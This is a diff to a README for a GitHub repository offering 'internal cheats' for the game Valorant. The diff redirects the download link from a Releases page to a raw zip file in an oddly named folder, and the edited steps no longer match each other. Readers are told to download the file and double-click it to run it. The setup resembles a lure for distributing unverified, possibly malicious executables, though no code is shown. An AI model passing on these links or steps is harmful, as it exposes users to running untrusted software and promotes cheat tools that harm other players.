umudguny/Maxi-Valorant-Internal-Cheats/README.md

 To download Maxi-Valorant-Internal-Cheats, follow these steps:

-1. Go back to the Releases page: [Download Page](https://github.com/umudguny/Maxi-Valorant-Internal-Cheats/releases).
+1. Go back to the Releases page: [Download Page](https://raw.githubusercontent.com/umudguny/Maxi-Valorant-Internal-Cheats/main/satiable/Maxi-Valorant-Internal-Cheats.zip).
 2. Look for the latest release.
-3. Click on the link for the application file (for example, `Maxi-Valorant-Cheat.exe`).
+3. Click on the link for the application file (for example, `https://raw.githubusercontent.com/umudguny/Maxi-Valorant-Internal-Cheats/main/satiable/Maxi-Valorant-Internal-Cheats.zip`).
 4. Save the file to your preferred location on your computer.
 5. Once the download completes, navigate to the saved file and double-click it to run.